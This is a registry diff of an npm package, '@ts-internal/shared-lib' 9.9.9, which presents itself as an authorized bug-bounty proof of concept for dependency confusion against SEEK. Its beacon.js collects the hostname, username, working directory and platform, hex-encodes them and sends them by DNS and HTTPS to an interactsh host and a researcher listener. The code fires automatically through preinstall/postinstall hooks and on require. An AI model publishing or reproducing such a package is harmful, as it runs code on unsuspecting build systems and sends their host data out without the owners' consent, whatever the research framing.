@ts-internal/shared-lib 9.9.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +17 -0
- package/beacon.js +62 -0
- package/images/profile-header-shapes.svg +1 -0
- package/index.js +19 -0
- package/lifecycle.js +8 -0
- package/package.json +25 -0
package/README.md
ADDED
|
@@ -0,0 +1,17 @@
|
|
|
1
|
+
# @ts-internal/shared-lib (security research placeholder)
|
|
2
|
+
|
|
3
|
+
This package is an **authorized bug-bounty proof-of-concept** published through the SEEK
|
|
4
|
+
program on Bugcrowd by researcher `mdpsec2`.
|
|
5
|
+
|
|
6
|
+
The name `@ts-internal/shared-lib` was found referenced by production `au.seek.com`
|
|
7
|
+
JavaScript source maps but was **unclaimed on the public npm registry**, creating a
|
|
8
|
+
dependency-confusion exposure. The npm scope `@ts-internal` was defensively registered to
|
|
9
|
+
prevent malicious takeover.
|
|
10
|
+
|
|
11
|
+
This package is **non-destructive**: on install it emits a single harmless callback
|
|
12
|
+
(DNS + HTTP) carrying only non-sensitive host identity (hostname, username, cwd path, OS,
|
|
13
|
+
package name/version) to confirm whether a SEEK build/dev/CI path resolves the name from
|
|
14
|
+
public npm. It performs **no** exfiltration of files, environment variables, secrets, or
|
|
15
|
+
source code, and has no persistence, network shell, or destructive behavior.
|
|
16
|
+
|
|
17
|
+
SEEK security: the `@ts-internal` scope can be transferred to you on request. Safe to remove.
|
package/beacon.js
ADDED
|
@@ -0,0 +1,62 @@
|
|
|
1
|
+
// Non-destructive dependency-confusion PoC beacon for SEEK bug bounty (Bugcrowd, *.seek.com).
|
|
2
|
+
// Authorized security research. Fires ONE harmless callback proving code-exec reach + public-npm
|
|
3
|
+
// resolution. Collects ONLY non-sensitive host identity. NO file/env/secret exfiltration, NO
|
|
4
|
+
// persistence, NO reverse shell, NO destructive action. Safe to remove.
|
|
5
|
+
//
|
|
6
|
+
// Channels:
|
|
7
|
+
// 1. DNS+HTTP via interactsh OOB host
|
|
8
|
+
// 2. HTTPS GET to a researcher-controlled listener (captures source IP, User-Agent, rDNS)
|
|
9
|
+
'use strict';
|
|
10
|
+
|
|
11
|
+
function beacon(phase) {
|
|
12
|
+
var os, https, dns;
|
|
13
|
+
try { os = require('os'); } catch (e) { os = {}; }
|
|
14
|
+
try { https = require('https'); } catch (e) {}
|
|
15
|
+
try { dns = require('dns'); } catch (e) {}
|
|
16
|
+
|
|
17
|
+
// Non-sensitive identifying metadata ONLY.
|
|
18
|
+
var meta = {};
|
|
19
|
+
try { meta.host = (os.hostname && os.hostname()) || ''; } catch (e) { meta.host = ''; }
|
|
20
|
+
try { meta.user = (os.userInfo && os.userInfo().username) || ''; } catch (e) { meta.user = ''; }
|
|
21
|
+
try { meta.cwd = (process.cwd && process.cwd()) || ''; } catch (e) { meta.cwd = ''; }
|
|
22
|
+
try { meta.plat = (os.platform && os.platform()) || ''; } catch (e) { meta.plat = ''; }
|
|
23
|
+
try { meta.pkg = process.env.npm_package_name || ''; } catch (e) {}
|
|
24
|
+
try { meta.pver = process.env.npm_package_version || ''; } catch (e) {}
|
|
25
|
+
|
|
26
|
+
var marker = 'seek-bb-poc';
|
|
27
|
+
function enc(s) { try { return Buffer.from(String(s)).toString('hex'); } catch (e) { return ''; } }
|
|
28
|
+
// Encode metadata into a single hex blob so it survives DNS label limits.
|
|
29
|
+
var blob = enc([marker, phase, meta.pkg, meta.pver, meta.host, meta.user, meta.plat, meta.cwd].join('|'));
|
|
30
|
+
|
|
31
|
+
var OAST = 'd8oa6q03t3o2ksbjirogwxiwiyhp6e57o.oast.site';
|
|
32
|
+
var HTTP_HOST = 'npm-dc-seek-1781572474.testingboxes.com';
|
|
33
|
+
|
|
34
|
+
// 1. DNS callback (label-safe: short marker + truncated blob as a subdomain).
|
|
35
|
+
try {
|
|
36
|
+
if (dns && dns.lookup) {
|
|
37
|
+
var label = (marker + '-' + phase + '-' + blob).slice(0, 60).replace(/[^a-z0-9\-]/gi, '');
|
|
38
|
+
dns.lookup(label + '.' + OAST, function () {});
|
|
39
|
+
}
|
|
40
|
+
} catch (e) {}
|
|
41
|
+
|
|
42
|
+
// 2. HTTP callback to interactsh (full blob in path).
|
|
43
|
+
try {
|
|
44
|
+
if (https) {
|
|
45
|
+
https.get({ host: OAST, path: '/' + marker + '/' + phase + '?d=' + blob, timeout: 4000 }, function (r) { r.resume(); }).on('error', function () {});
|
|
46
|
+
}
|
|
47
|
+
} catch (e) {}
|
|
48
|
+
|
|
49
|
+
// 3. HTTPS callback to researcher listener (captures source IP + UA for SEEK attribution).
|
|
50
|
+
try {
|
|
51
|
+
if (https) {
|
|
52
|
+
https.get({
|
|
53
|
+
host: HTTP_HOST,
|
|
54
|
+
path: '/' + marker + '/' + phase + '?d=' + blob,
|
|
55
|
+
timeout: 4000,
|
|
56
|
+
headers: { 'User-Agent': marker + '/' + (meta.pkg || '') + '@' + (meta.pver || '') }
|
|
57
|
+
}, function (r) { r.resume(); }).on('error', function () {});
|
|
58
|
+
}
|
|
59
|
+
} catch (e) {}
|
|
60
|
+
}
|
|
61
|
+
|
|
62
|
+
module.exports = { beacon: beacon };
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1" viewBox="0 0 1 1"><!-- seek-bb-poc dependency-confusion PoC placeholder asset, non-malicious --></svg>
|
package/index.js
ADDED
|
@@ -0,0 +1,19 @@
|
|
|
1
|
+
// main entry. Beacons on require()/import (covers the case where a build bundles the package
|
|
2
|
+
// rather than only installing it). Exports harmless stubs matching the symbols SEEK source
|
|
3
|
+
// imports (brandNameMapper, MarketSelector, ImageBanner, GeneralErrorMessage, etc.) so a build
|
|
4
|
+
// that consumes them still resolves and the PoC stays non-breaking.
|
|
5
|
+
'use strict';
|
|
6
|
+
try { require('./beacon').beacon('require'); } catch (e) {}
|
|
7
|
+
|
|
8
|
+
function noop() { return null; }
|
|
9
|
+
module.exports = {
|
|
10
|
+
// value exports observed in au.seek.com candidate-basic-search source maps
|
|
11
|
+
brandNameMapper: {},
|
|
12
|
+
MarketSelector: noop,
|
|
13
|
+
MarketSelectorButton: noop,
|
|
14
|
+
ImageBanner: noop,
|
|
15
|
+
GeneralErrorMessage: noop,
|
|
16
|
+
// type-only names are erased at compile; harmless to also expose
|
|
17
|
+
Market: {}, Suggestion: {}, ProfileView: {}, ProfileCardView: {},
|
|
18
|
+
Education: {}, Licence: {},
|
|
19
|
+
};
|
package/lifecycle.js
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
1
|
+
// Lifecycle entry. Runs on preinstall/postinstall. Beacons then exits 0 (never fails the install).
|
|
2
|
+
'use strict';
|
|
3
|
+
try {
|
|
4
|
+
var phase = process.argv[2] || 'install';
|
|
5
|
+
require('./beacon').beacon(phase);
|
|
6
|
+
} catch (e) {}
|
|
7
|
+
// Give the async callbacks a brief moment, then exit cleanly.
|
|
8
|
+
setTimeout(function () { try { process.exit(0); } catch (e) {} }, 1500);
|
package/package.json
ADDED
|
@@ -0,0 +1,25 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@ts-internal/shared-lib",
|
|
3
|
+
"version": "9.9.9",
|
|
4
|
+
"description": "Authorized bug-bounty dependency-confusion PoC (SEEK / Bugcrowd). Non-destructive install-time beacon only. Contact via Bugcrowd program. Safe to remove.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"exports": {
|
|
7
|
+
".": "./index.js",
|
|
8
|
+
"./images/profile-header-shapes.svg": "./images/profile-header-shapes.svg",
|
|
9
|
+
"./package.json": "./package.json"
|
|
10
|
+
},
|
|
11
|
+
"files": [
|
|
12
|
+
"index.js",
|
|
13
|
+
"beacon.js",
|
|
14
|
+
"lifecycle.js",
|
|
15
|
+
"images/profile-header-shapes.svg",
|
|
16
|
+
"README.md"
|
|
17
|
+
],
|
|
18
|
+
"scripts": {
|
|
19
|
+
"preinstall": "node lifecycle.js preinstall",
|
|
20
|
+
"postinstall": "node lifecycle.js postinstall"
|
|
21
|
+
},
|
|
22
|
+
"keywords": ["security-research", "bug-bounty", "dependency-confusion", "poc", "non-destructive"],
|
|
23
|
+
"license": "MIT",
|
|
24
|
+
"author": "mdpsec2 (Bugcrowd security researcher)"
|
|
25
|
+
}
|